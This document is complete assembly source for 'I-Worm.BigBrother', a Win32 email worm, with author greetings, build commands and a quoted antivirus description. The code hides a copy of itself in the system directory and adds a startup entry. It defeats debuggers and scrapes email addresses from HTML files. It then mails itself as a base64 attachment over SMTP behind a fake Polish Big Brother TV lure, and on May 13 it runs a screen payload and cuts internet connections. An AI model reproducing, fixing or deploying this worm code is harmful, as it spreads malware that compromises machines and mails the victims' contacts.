MalwareSourceCode/Win32/InternetWorm/I-Worm.BigBrother.asm

;================================================================================================
;	     :æÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄæ:	
;             Ä #####################++++++++++++++++++ Ä
;	      Ä #:I-Worm.BigBrother #¿       !       ¿+ Ä
;	      Ä ####################*################## Ä
;	      Ä	+¿       !         ¿#:BioCoded by YuP # Ä
;             Ä ++++++++++++++++++++################### Ä
;            :æÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄæ:
;
;
;
;
; [Disclaimer]                                         
; ^~^~^~^~^~^~^
;	This file is a demonstration of WINASM coding. Educational purposes only!
;	Author is not responsabile of any kind of damages which may occur after the 
;       asembly of this file.
;	I TAKE NO RESPONSIBILITY FOR ANY ACTIONS WITH THIS CODE.
;
; [2002 CURRENT NOTES]
; This worm is so old that i don't remember when i have coded it, 
; it is VERY VERY LAME! IT WAS CODED IN THIS TIMES WHEN I THOUHGT
; THAT WINASM = API CALL! AND YOU WILL SEE IT IN A SOURCE!
; SO IT IS GOOD FOR LAMMIEZ! 
;
; Ad added 28.06.2002 - by Lord YuP / TKT - templars.org - tkt.planetsecurity.net
; [current greetz for all guyz from #virus and TKT memberz!]
;
;
;
;
; [Greetz]
; ^~^~^^~^
; Big thx goez to: * Dageshi (#VXERS) - you helped me a lot ;>.
;		   * T-2000 / Immortal Riot (4 base encoder sample).
;
; Otherz (pozdrufka) to: detergent, blaze, b0sman, Exeq, Fidiasz , Duszek, Kwaz,
;                        tompaw69, PlayerPL, Grabarz (dragon bratha) 
;			 Crash and otherz polish coderz.
;
; Bonus thx to:  Dla Karolinki (z BB) -jestes tak glupia ,ze mi cie szkoda. 
; (natchnienie)  Ricky Martin ;P, Renegat, Rino Reinz, Ciuny, Palguma, 
;		 Balon. 
;                       
; Thx 4 payload txt to: Linkin Park (R) KeWl Music Group
;
; [How to Compile]
; ^~^~^~^~^~^~^~^
; %: tasm32 /m1 /mx big.asm
; %: tlink32 /Tpe /aa  big,big,,import32.lib
; %: brc32 big.res
; 
; % NOTE. File is also compressed & encrypted by tElock tool ,ver.051
; 
;
;
; [Info]
; ^~^~^~
; .:[SUPPORT.AVX.COM]: (my commentz in *[]*)
;
;
;
; Details:
;---------
;Name : I-Worm.BigBrother
;Type: Internet Worm
;Aliases: none
;Size: 12800 bytes
;
;At the time of writing this we have only received one report of infection.
;
;
;Description:
;---------------
;This is a virus which arrives in your e-mail in the following formatt:
;
;From: "BIGBROTHER TVN POLSKA" bigbrother@bigbrother.tvn.com.pl
;Subject: BIGBROTHER SHOW !
;
;Body: Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to
;zrobic? Wystarczy ze uruchomisz specjalny program
;(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci.
;Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie
;osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda
;nagrody (telewizory, wieze stereo,
;komputery ...i wiele ,wiele innych). Prosimy przysylac
;opinie i komentarze na temat programu.
;
;
;Zyczymy milej zabawy:
;
;Redakcja programu.
;
;Attachment: BigBrother_Live_Camera.exe
;
;When the user opens the attachment, the virus copies itself to C:\WINDOWS\SYSTEM with the name: ;b1g_brother.exe
;and adds the following line in WIN.INI: in the section [windows]
;
;run=c:\Windows\System\b1g_brother.exe
;
;After that it checks if the computer is connected to the Internet and then starts sending itself ;through e-mail in the format presented above.
;
;In order to get e-mail addresses it scans all hard drives for html files and it search inside ;them for the string mailto:, and it sends itself to those addresses. *[no in hd but in 
;My Documents folder na Temp]*
;
;In case of running the b1g_brother.exe manually it shows the following message:
;SEGMENTATION FAULT.
;Please REPORT this BUG.
;
 
;Payload:
;-----------
;On May 13 it displays the following message:

;You like to think youÆre never wrong 
;You want to act like youÆre someone 
;You want someone to hurt like you 
;You want to share what youÆve been through 
;You live what you learn... 
;
;Today you know the truth: i-worm.BigBrother 
;Now contact with yourz AV expert. 
;Future , Don't trust anyone ... 
;                               [YuP/0ne Earth]
;payyes *[what?]*

;Detection has been added.
;
;
;
;
; [Bugz] 
; ^~^~^~
; This i-worm should be able to work on win32 platformz without any erroz. Opps ;) it should be.
; On win98 (when i and dageshi were testing it) were some bugz (win98 fuck out).
; I don't know why ;) i don't have any time to check it with any debugER ;]
; do it yourself if you want of coz. This is my 1st i-worm and its very 
; 'low-coded' i think ... The next onez should be better.
;
;
;================================================================================================
; 				        [L]etz  [S]tart 
; 				       oO-= Have fun! =-Oo	
;================================================================================================

.486p
locals
jumps
.model flat,STDCALL

extrn ExitProcess:PROC   ;i love it 
extrn CopyFileA:PROC  	 ;did i miss sth ? 
extrn MessageBoxA:PROC
extrn SetFileAttributesA:PROC
extrn GetSystemDirectoryA:PROC
extrn lstrcatA:PROC
extrn lstrcpyA:PROC
extrn CreateFileA:PROC
extrn ExitWindowsEx:PROC
extrn Sleep:PROC
extrn CreateMutexA:PROC
extrn GetCurrentProcessId:PROC
extrn LoadLibraryA:PROC
extrn GetProcAddress:PROC
extrn PeekMessageA:PROC
extrn OpenMutexA:PROC
extrn RegOpenKeyExA:PROC
extrn RegQueryValueExA:PROC
extrn RegCloseKey:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn CreateFileA:PROC
extrn CloseHandle:PROC
extrn ReadFile:proc
extrn CharNextA:PROC
extrn lstrcpyn:PROC
extrn lstrlenA:PROC
extrn lstrcmp:PROC
extrn lstrcpy:PROC
extrn FindClose:PROC
extrn GetTopWindow:PROC
extrn GetNextWindowA:PROC
extrn PostMessageA:PROC
extrn GetActiveWindow:PROC
extrn GetTempPathA:PROC
extrn send:PROC
extrn recv:PROC
extrn WSAStartup:PROC
extrn WSACleanup:PROC
extrn socket:proc
extrn connect:PROC
extrn gethostbyname:PROC
extrn closesocket:PROC
extrn lstrlen:PROC
extrn WinExec:PROC
extrn lstrcmpi:PROC
extrn ReleaseMutex:PROC
extrn GetFileSize:PROC
extrn WriteFile:PROC
extrn GetModuleFileNameA:PROC
extrn GetCurrentDirectoryA:PROC
extrn _lread:PROC
extrn SetCurrentDirectoryA:PROC
extrn WriteProfileStringA:PROC
extrn RegCreateKeyA:PROC
extrn RegOpenKeyA:PROC

;extrnz for payload
extrn SetTextColor:PROC
extrn GetDC:PROC
extrn TextOutA:PROC
extrn CreateFontA:PROC
extrn SelectObject:PROC
extrn LineTo:PROC
extrn GetSystemTime:PROC
extrn SetBkColor:PROC
extrn CreatePen:PROC



.DATA


signature db "[I-WORM.BigBr0th3r] (c) YuP",0
          db "Greetz to all #PHREAKPL CREW",0
          db "and #VXERS TERRORIST GROUP.",0
          db "Special thx goez to: Dageshi",0
          db "& detergent ",0
          db "-=* GOOD WORK AV PEOPLE ;P *=-",0

myname db 256 dup(?)
new db '\b1g_brother.exe',0
sysD db	256 dup(?)
sysDD db 256 dup(?)
tempD db 256 dup(?)
markerr db 'rundll32 kernel,FatalExit',0
krnl db 'KERNEL32.DLL',0
krnl_proc db 'RegisterServiceProcess',0
mutex_name db 'Kakaroth',0
mutexH dd ?
sys_name db 'b1g_brother.exe',0

module_filename db 256 dup(?)
dir db 1024 dup(?)
bslash db '\',0

;check connection
hang_connection   db 'InternetHangUp',0
check_connection  db 'InternetGetConnectedState',0
wininet_lib db 'WININET.DLL',0
lpdwFlagz dd 0


ini_key  db 'run',0
ini_sect db 'windows',0



;FOR REGISTRY
HKEY_LOCAL_MACHINE equ 80000001h
HKEY_CURRENT_USER equ 80000001h
hKeyPath db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
hPersonal db 'Personal',0
PersonalF db 128 dup(0)
PersonalFsize dd 128
hKeyHandle dd 0
my_key db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\silent_thunder',0
shit dd 0
shitshit dd 0

server_p db 'Software\Microsoft\Internet Account Manager\Accounts\00000001',0
server_h dd 0
server_s db 'SMTP Server',0
server db 128 dup(0)
server_size dd 128

;FOR SEARCH
fMASK db '\*.htm*',0
fMASK1 db '*.htm*',0
break db '\',0
oldd dd 128 dup(0)
bus db 260 dup(0) ;search buffer ;]
fsH dd ?
fHnd dd ?
sciezka db 260 dup(0)

WIN32_FIND_DATA         struc
dwFileAttributes        dd      0
dwLowDateTime0          dd      ?       ; creation
dwHigDateTime0          dd      ?
dwLowDateTime1          dd      ?       ; last access
dwHigDateTime1          dd      ?
dwLowDateTime2          dd      ?       ; last write
dwHigDateTime2          dd      ?
nFileSizeHigh           dd      ?
nFileSizeLow            dd      ?
dwReserved              dd      0,0
cFileName               db      260 dup(0)
cAlternateFilename      db      14 dup(0)
                        db      2 dup(0)
WIN32_FIND_DATA         ends

find_data               WIN32_FIND_DATA <?>

;for e-mailz
mail db 'mailto:',0
worm_size equ 10000h
worm_code db worm_size dup(0)
fH dd ?
searchH dd ?
counter equ 0
longBuff dd ?
clear db '',0
myB db 128 dup(?)
L1 db '"',0
mail_string db 128 dup(0)
mail_good db 128 dup(0)
sep db '',0

;======================[BASE ENCODE DATA]===============================
base_file db '00000b.rat',0
base_file_name db 128 dup(0)
base_to_code db '000000s.b64',0
base_to_code_buff db 128 dup(0)

Encoding_Table: DB      'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
                DB      'abcdefghijklmnopqrstuvwxyz'
                DB      '0123456789+/'

Input_Buffer    DB      200 DUP(0)
Output_Buffer   DB      200 DUP(0)

base_buff_size  equ 18516
base_buffer     DB base_buff_size DUP(0)  
base_size       dd 0
baL dd ?




input_handle dd ?
Input_Handle dd ?
output_handle dd ?
Output_Handle dd ?

IO_Bytes_Count  DD      0

OPEN_EXISTING           EQU     00000003h
CREATE_ALWAYS           EQU     00000002h
FILE_ATTRIBUTE_NORMAL   EQU     00000080h
GENERIC_READ            EQU     80000000h
GENERIC_WRITE           EQU     40000000h

;============[E-MAIL CLIEN7]========================
HELO db 'HELO bigbrother.r0x.pl',0dh,0ah


mime_code  db 'From: "BIGBROTHER TVN POLSKA" <bigbrother@bigbrother.tvn.com.pl>',0dh,0ah 
           db 'Subject: BIGBROTHER SHOW !',0dh,0ah
           db 'MIME-Version: 1.0',0dh,0ah
           db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah
           db 0dh,0ah,'--a1234',0dh,0ah
           db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah
	   db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah
	   db 0dh,0ah
           db 'Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to',0dh,0ah 
           db 'zrobic? Wystarczy ze uruchomisz specjalny program',0dh,0ah 
           db '(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci.',0dh,0ah 
           db 'Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie',0dh,0ah 
           db 'osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda',0dh,0ah 
           db 'nagrody (telewizory, wieze stereo,',0dh,0ah
           db 'komputery ...i wiele ,wiele innych). Prosimy przysylac',0dh,0ah
           db 'opinie i komentarze na temat programu.',0dh,0ah
           db 0dh,0ah
           db 0dh,0ah
           db 'Zyczymy milej zabawy:',0dh,0ah
           db 0dh,0ah
           db 'Redakcja programu.',0dh,0ah
	   db '',0dh,0ah
           db 0dh,0ah
           db 0dh,0ah,'--a1234',0dh,0ah
           db 'Content-Type: application/octet-stream; name="BigBrother_Live_Camera.exe"'
           db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah
           db 'Content-Disposition: attachment; filename="BigBrother_Live_Camera.exe"',0dh,0ah,0dh,0ah

mime_end db  0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah,0
mime_e equ mime_end

dot db '.',0dh,0ah

RCPT_1 db 'RCPT TO:<',0
RCPT_ENDD db '>',0dh,0ah,0

RCPT db	160 dup (?)	


MAIL_FROM db 'MAIL FROM:<bigbrohter@tvn.pl>',0dh,0ah

QUIT db 'QUIT',0dh,0ah 
_DATA_ db 'DATA',0dh,0ah

e_end db '',0



;==================================[END MAIL DATA]====================================

;==================================[WIN SOCKZ]========================================

addr    struc
proto   dw 2     
port    dw 1900h 
ip      db 127,0,0,1      
addr    ends

addr2 addr <>


sock dd ?
SOCK_STREAM EQU 1 
AF_INET EQU 2     
WSA_Data DB 400 DUP(0)
SOCKET_ERR equ -1
HOSTENT_IP equ 10h  

rB dd ?
;==================[END WIN SOCKZ]=========================================

;============[END E-MAIL DATA]=============================================

;FOR STEALTH
err_title db 'Setup',0
markerror db 'Segmentation fault.',0dh,0ah,0dh,0ah
          db      'Please REPORT this BUG.',0
          db      0dh,0ah,0


;PAYLOAD

;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
;===========[PAYL0AD ;))]================================================== 
dcH dd ?
brH dd ?
fontH dd ?                                          		;~^~^~^~^~^~^~^^~^~^~^~^
info_line_1 db "You like to think you’re never wrong",0  	;some lyrics from:
info_line_2 db "You want to act like you’re someone",0   	;'POINTS OF AUTHORITY' - song
info_line_3 db "You want someone to hurt like you",0     	;of my best music group -     
info_line_4 db "You want to share what you’ve been through",0   ;[L]inkin [P]ark ;))
info_line_5 db "You live what you learn...",0 			;~^~^~^~^~^~^~^~^~^~^~^~^

info_line_6 db "Today you know the truth: i-worm.BigBrother",0	;some txt from myself
info_line_7 db 'Now contact with yourz AV expert.',0
info_line_8 db "Future , Don't trust anyone ... [YuP/0ne Earth]",0

sysTimeStruct db 16 dup(0)

payday db 128 dup(0)
payyes db 'payyes',0

;===========[END PAY DATA]=================================================
;-------------------------------------------------------------------------*
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
;-------------------------------------------------------------------------*
;===========[CODE SECTION]=================================================

.CODE
Kakaroth:
push 256
push offset module_filename
push 0
call GetModuleFileNameA

xor ebp,ebp
mov ebp,offset module_filename

push offset dir
push 256
call GetCurrentDirectoryA

push offset bslash
push offset dir
call lstrcatA

push offset dir
call lstrlen
mov edi,eax

sub ecx,edi

C_NEXT:
push ebp
call CharNextA
mov ebp,eax

dec edi
jnz C_NEXT

push ecx
push ebp
push offset myname
call lstrcpyn

@DEBUG_CODE:
lea     eax,dword ptr [esp-8h]          
xor     esi,esi
xchg    eax,dword ptr fs:[esi]
lea     edi,exception
push    edi


push    eax

call    @antidebug       
                
@antidebug:                                 
add esp,4
cmp esi,dword ptr fs:[esi+20h]      
je  @SKIP_DEBUG
jmp @HEART_STOPS
          
@SKIP_DEBUG:
push 0                      
push 0                        
push 0                       
push 0
push 0
call PeekMessageA

@COPY_FILE:
push 256
push offset sysD
call GetSystemDirectoryA

xor eax,eax

push offset new
push offset sysD
call lstrcatA
cmp eax,0
jc @EXIT

push 0
push offset sysD
push offset myname
call CopyFileA
cmp eax,0
jc @EXIT

push 01h OR 02h
push offset sysD
call SetFileAttributesA

push offset myname
push offset sys_name
call lstrcmpi
cmp eax,0
jne @RUN_SYS_FILE

@_CHECK_4_PAYLOAD:
push offset sysTimeStruct
call GetSystemTime
xor eax,eax
lea eax,sysTimeStruct
cmp word ptr [eax+2],5 ; 13th May
jne @SKIP_PAY
cmp word ptr [eax+6],13 
jne @SKIP_PAY    


@PAY:		;payload
push 50000      ;sp00ky one ;)) 
call Sleep	;wait some time 

push 0h
call GetDC
mov dword ptr [dcH],eax

push 0 
push 1000h
push 1
call CreatePen
mov dword ptr [brH],eax

push dword ptr [brH]
push dword ptr [dcH]
call SelectObject

push 500
push 300
push dword ptr [dcH]
call LineTo

;=======[FONT]=================================================
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0
push 0
push 13
push 23
call CreateFontA
mov dword ptr [fontH],eax


push dword ptr [fontH]
push dword ptr [dcH]
call SelectObject



push 0 
push dword ptr [dcH]
call SetBkColor


push 16777215 		;color - white 
push dword ptr [dcH]
call SetTextColor


;======[END FONT]===========================================


@TEXT:
push 16777215
push dword ptr [dcH]
call SetTextColor

mov esi,160
mov edx,offset info_line_1
mov ecx,140
call @TEXT_OUT

mov edx,offset info_line_2
mov ecx,170
call @TEXT_OUT

mov edx,offset info_line_3
mov ecx,200
call @TEXT_OUT

mov edx,offset info_line_4
mov ecx,230
call @TEXT_OUT

mov edx,offset info_line_5
mov ecx,260
call @TEXT_OUT

mov esi,160
mov edx,offset info_line_6
mov ecx,350
call @TEXT_OUT

mov esi,160
mov edx,offset info_line_7
mov ecx,380
call @TEXT_OUT

mov esi,160
mov edx,offset info_line_8
mov ecx,435
call @TEXT_OUT

push offset payyes
push offset payday
call lstrcatA

call @SKIP_PAY


@TEXT_OUT: 		;text-out function 
push edx
call lstrlenA

push eax
push edx
push ecx
push esi
push dword ptr [dcH]
call TextOutA

ret


@SKIP_PAY:
@RESIDENT:
push offset mutex_name  ;am i in memory now ?
push 0
push 1
call OpenMutexA
cmp eax,0
jne @I_WAS_HERE
je @NEXT_

@I_WAS_HERE:
push 010h
push offset err_title
push offset markerror
push 0h
call MessageBoxA
push 0h
call ExitProcess

@NEXT_:
push offset mutex_name ;nop then go there
push 1
push 0
call CreateMutexA
mov dword ptr [mutexH],eax

xor edx,edx
xor eax,eax

push offset krnl
call LoadLibraryA
cmp eax,0
jc @EXIT
push offset krnl_proc
push eax
call GetProcAddress
or eax,eax
jz @PR
mov edx,eax

call GetCurrentProcessId

;push 1
;push eax
;call edx

@PR:
push offset sysD
push offset ini_key
push offset ini_sect
call WriteProfileStringA


call @GET_MAILZ_START

@GET_MAILZ_START:
xor eax,eax
push offset hKeyHandle                  
push 0                              
push 0
push offset hKeyPath
push HKEY_LOCAL_MACHINE
call RegOpenKeyExA
cmp eax,0
jne @EXIT

push offset PersonalFsize               
push offset PersonalF                
push 0
push 0
push offset hPersonal
push hKeyHandle  
call RegQueryValueExA

push offset server_h                  
push 0                              
push 0
push offset server_p
push HKEY_CURRENT_USER
call RegOpenKeyExA
cmp eax,0
jne @EXIT

push offset server_size              
push offset server               
push 0
push 0
push offset server_s
push server_h  
call RegQueryValueExA

;PersonalF -> like My Docz

push hKeyHandle
call RegCloseKey




push offset base_file_name
push 260
call GetTempPathA

push offset base_file
push offset base_file_name
call lstrcatA


;=======================[BASE ENCODER]==========================
;Thx goez to: * T-2000 / Immortal Riot (4 base encoder sample) +
;             * dageshi (4 everything)                         +
;=============================================================== 
@_BASE_ENCODER:


push offset base_to_code_buff ;copy source file
push 260
call GetTempPathA

push offset base_to_code
push offset base_to_code_buff
call lstrcatA

push 1
push offset base_to_code_buff
push offset sysD
call CopyFileA


;ble ble ble


XOR EBX, EBX

PUSH EBX                    
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH GENERIC_READ
PUSH OFFSET base_to_code_buff      
CALL CreateFileA

MOV [Input_Handle], EAX

PUSH EBX                 
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_ALWAYS
PUSH EBX
PUSH EBX
PUSH GENERIC_WRITE
push OFFSET base_file_name 
CALL CreateFileA

MOV [Output_Handle], EAX

PUSH 0                            ;wpiszem standard
PUSH OFFSET IO_Bytes_Count
PUSH (offset mime_end-offset mime_code)
push offset mime_code
PUSH [Output_Handle]
CALL WriteFile
cmp eax,0
je @ERROR

PUSH EBX                      ;size
PUSH [Input_Handle]
CALL GetFileSize

CDQ
MOV ECX, (76/4)*3
DIV ECX

DEC EDX
JS  No_Round

INC EAX

No_Round: 
XCHG ECX, EAX

Encode_Line:    
PUSH ECX

MOV ESI, OFFSET Input_Buffer

PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH (76/4)*3
PUSH ESI
PUSH [Input_Handle]
CALL ReadFile

MOV EDI, OFFSET Output_Buffer

PUSH EDI

PUSH 76/4
POP ECX

Encode_Packet:  
PUSH ECX

MOV CL, 8

LODSB
SHL EAX, CL

LODSB
SHL EAX, CL

LODSB
SHL EAX, CL

MOV EBX, OFFSET Encoding_Table

MOV CL, 4

Encode_Byte:   
SHR EAX, 2

ROL EAX, 8

XLAT
STOSB

LOOP Encode_Byte

POP ECX

LOOP Encode_Packet

MOV WORD PTR [EDI], 0A0Dh   ; <CRLF>.

POP EAX

PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH 78
PUSH EAX
PUSH [Output_Handle]
CALL WriteFile

POP ECX

LOOP Encode_Line

push [Output_Handle]
call CloseHandle


;=====================================================[END BASE ENCODER]===========

;=====================================================[GET BASE CODE TO BUFF]======

@GET_BASE_CODE:
push 00000000h 
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 80000000h
push offset base_file_name     
call CreateFileA   
mov edi,eax


push 0
push edi
call GetFileSize


push 0                       
push offset baL
push eax
push offset base_buffer
push edi
call ReadFile

;=====================================================[END GETTING]===============
@NEXT__:
push offset shitshit
push offset my_key
push HKEY_LOCAL_MACHINE
call RegOpenKeyA
cmp eax,0
je @EXIT

push offset shit
push offset my_key
push HKEY_LOCAL_MACHINE
call RegCreateKeyA

mov bh,0
mov bl,0
CALL @SCAN_MYDOCZ

@SCAN_TEMP:
push offset tempD
push 260
call GetTempPathA

push offset clear
push offset bus
call lstrcpyA

push offset tempD
push offset bus
call lstrcpyA

push offset fMASK1 ;add 
push offset bus
call lstrcatA


call @FIND_1st
call @GO_GO1

@SCAN_MYDOCZ:
xor edi,edi

push offset clear
push offset bus
call lstrcpyA

push offset PersonalF 
push offset bus
call lstrcpyA

push offset fMASK ;add 
push offset bus
call lstrcatA

call @FIND_1st
call @GO_GO

@FIND_1st:

push offset find_data
push offset bus
call FindFirstFileA
mov dword ptr [searchH],eax
cmp eax,-1    
je @ERROR

ret

@CLEAR_PATH:
push offset clear
push offset sciezka
call lstrcpyA
ret

@GO_GO:
call @CLEAR_PATH
xor edi,edi
push offset PersonalF
push offset sciezka
call lstrcatA
push offset break
push offset sciezka
call lstrcatA
push offset find_data.cFileName
push offset sciezka
call lstrcatA
xor edi,edi
mov edi,offset sciezka
call @SCAN_HTM_FILE_STEP1

@GO_GO1:
call @CLEAR_PATH
xor edi,edi
push offset tempD
push offset sciezka
call lstrcatA
push offset break
push offset sciezka
call lstrcatA
push offset find_data.cFileName
push offset sciezka
call lstrcatA
xor edi,edi
mov edi,offset sciezka
call @SCAN_HTM_FILE_STEP1



@SCAN_HTM_FILE_STEP1:

push 00000000h 
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 80000000h
push edi     
call CreateFileA   
cmp  eax,-1  
je @ERROR_M

mov dword ptr [fH],eax 


push 0h
push offset longBuff
push worm_size ;size
push offset worm_code 
push dword ptr [fH]
call ReadFile
cmp eax,0
je @ERROR_M

call @CLEAR

@MARK:
xor esi,esi
mov esi,0
xor ebp,ebp
mov ebp,offset worm_code
xor edi,edi
mov edi,1

@ALGORITM:
xor edi,edi
mov edi,1
call LOOPING_JOE

push offset L1
push offset myB
call lstrcmp
cmp eax,0
je @CH

inc esi
cmp esi,10000
ja @END_OF_FILE
call @ALGORITM

@CH:
call @CLEAR
call @CHECK_STRING

LOOPING_JOE:
push ebp
call CharNextA
mov ebp,eax

push 2
push ebp        
push offset myB 
call lstrcpyn

ret


@CHECK_STRING:
call LOOPING_JOE

push offset myB
push offset mail_string
call lstrcatA

inc esi
inc edi
cmp edi,8
jne @CHECK_STRING
je @IS_IT_GOD

@IS_IT_GOD:
push offset mail
push offset mail_string
call lstrcmp
cmp eax,0
je @GET_MAIL
jne @ALGORITM


@GET_MAIL:
call LOOPING_JOE

push offset L1
push offset myB
call lstrcmp
cmp eax,0
je @END_MAIL

push offset myB
push offset mail_good
call lstrcatA

inc esi
cmp esi,1000
jne @GET_MAIL

@END_MAIL:  ;TU GEN MAIL 

inc bl
cmp bl,10
ja @ERROR

call @SEND_MAIL

@NEXT_MAILL:
xor edi,edi
mov edi,1

call @ALGORITM

@END_OF_FILE:
push dword ptr [fH]
call CloseHandle

xor eax,eax
xor ebp,ebp
call @CLEAR
call @CLEAR_BUFF
call @FIND_NEXT_FILE

@CLEAR:
push offset sep
push offset mail_good
call lstrcpy
push offset sep
push offset mail_string
call lstrcpy
ret

@CLEAR_BUFF:
push offset sep
push offset worm_code
call lstrcpy
ret

exception:                                     
xor esi,esi                         
mov eax,dword ptr fs:[esi]
mov esp,dword ptr [eax]

@FIND_NEXT_FILE:

push offset find_data
push dword ptr [searchH]
call FindNextFileA
cmp eax,0
je @ERROR_NO_FILEZ_LEFT

cmp bh,1
ja @GO_TO_GO1
call @GO_GO

@GO_TO_GO1:
call @GO_GO1

@ERROR:

push dword ptr [fHnd]                
call CloseHandle

call @EXIT

@ERROR_M:
push dword ptr [searchH]
call FindClose
call @EXIT


@ERROR_NO_FILEZ_LEFT:
cmp bh,2
je @ERROR_M
ja @ERROR_M
add bh,2
push dword ptr [searchH]
call FindClose
call @SCAN_TEMP


@SEND_MAIL:
push offset RCPT_1
push offset RCPT
call lstrcatA

push offset mail_good
push offset RCPT
call lstrcatA

push offset RCPT_ENDD
push offset RCPT
call lstrcatA

;======[CHECK INTERNET STATE]=======
;WININET.DLL REQUIRED :>           +
;===================================
@CHECK_CONN:
push 500		;little stealth 
call Sleep

push offset wininet_lib
call LoadLibraryA

push offset check_connection
push eax
call GetProcAddress
xchg eax,ecx
jecxz @INIT_W

;push 0
;push offset lpdwFlagz
;call ecx
;or eax,eax
;jz @CHECK_CONN


;======[INIT WINSOCK]================
@INIT_W:
push offset WSA_Data         
PUSH 0101h
CALL WSAStartup
cmp eax,0
jne @EXIT

push 0		
push SOCK_STREAM			
push AF_INET				
call socket                  		
cmp  eax,SOCKET_ERR			
je   @CLEAN
mov  sock,eax

;======[CONNECT]=====================

;push    offset server
;call    gethostbyname                   
;cmp     eax,0
;je      @CLEAN


;mov     eax,dword ptr [eax+HOSTENT_IP]  
;mov     eax,dword ptr [eax]
;mov     dword ptr [addr2.ip],eax


push 16
push offset addr2
push sock
call connect        
cmp ax,SOCKET_ERR	
je @CLEAN	  

;======[READ AND SEND LOOP]==========

push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv

push 0
push 24
push offset HELO
push sock
call send

push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv

push 0
push 31
push offset MAIL_FROM
push sock
call send

push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv

push offset RCPT
call lstrlen

push 0
push eax
push offset RCPT
push sock
call send

push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv

push 0
push 6
push offset _DATA_
push sock
call send

push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv

push offset base_buffer
call lstrlen

push 0
push eax
push offset base_buffer
push sock
call send


push 0
push 3
push offset dot
push sock
call send

push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv

push 0
push 6
push offset QUIT
push sock
call send

push sock
call closesocket

call WSACleanup

push offset sep
push offset RCPT
call lstrcpy

push 5000
call Sleep

call @NEXT_MAILL

@EX:

push sock
call closesocket
push 0h
call ExitProcess

@CLEAN:
call WSACleanup
push 0h
call @EXIT



@EXIT:
push offset payday
push offset payyes
call lstrcmp
cmp eax,0
je @HANG_ALL_CONNECTIoNZ
jne _STAY_IN_MEM


_STAY_IN_MEM:
push 50000
call Sleep
call _STAY_IN_MEM

@BUFFER_OVERFLOW:
call GetActiveWindow      ;zabijamy aktywne okno przypuszczalnie debugger
mov edx,eax               ;nieskonczona petla powoduje blad w kernelu
push 0                 	  ;plik robaka bedzie dostepny po resecie systemu ;))      
push 0                        
push 12h                        
push edx                        
call PostMessageA               
CALL @BUFFER_OVERFLOW

@HEART_STOPS:
push 1
push offset markerr
call WinExec

push 100
call Sleep

call @BUFFER_OVERFLOW

@RUN_SYS_FILE:
push 256
push offset sysDD
call GetSystemDirectoryA

push offset sysDD
call SetCurrentDirectoryA

push 500
call Sleep

push 1
push offset sysD
call WinExec

push dword ptr [mutexH]
call ReleaseMutex

push 0h
call ExitProcess


@HANG_ALL_CONNECTIoNZ:

push 500		;timer 
call Sleep

push offset wininet_lib
call LoadLibraryA

push offset hang_connection
push eax
call GetProcAddress
xchg eax,ecx

push 0h				;kiss me goodbye ;) 
push offset lpdwFlagz           ;I don`t know that this WININET
call ecx                        ;function is working ;)  Refer
call @HANG_ALL_CONNECTIoNZ 	;to Jacob Navia it should be. 
				;[*Nice 'WININET' Ref ;) Big Thx :*]
End Kakaroth
;================================================================================================
; +1679 linez of asm c0de ;)) ? I did it ? he he ... 
; 
;================================================================================================
;***** This is the end of your jurney... Sorry about commentz...i know - my english skillz. *****
;================================================================================================
;      				eEEEEEe   nNn    Nn   dDDDd                                    #+
;				EE        NNnN   nN   Dd   dD				       #+
;   				EEEe      nN nN  nN   dD    dD  			       #+
;   				EE        NN  nN nN   Dd   dD  	              		       #+
;  				eEEEEEe   nN   nNNn   dDDDd				       #+
; 											       #+
;			      -= .: CoDinG is No7 a CrIm3 :. =-                                #+
;================================================================================================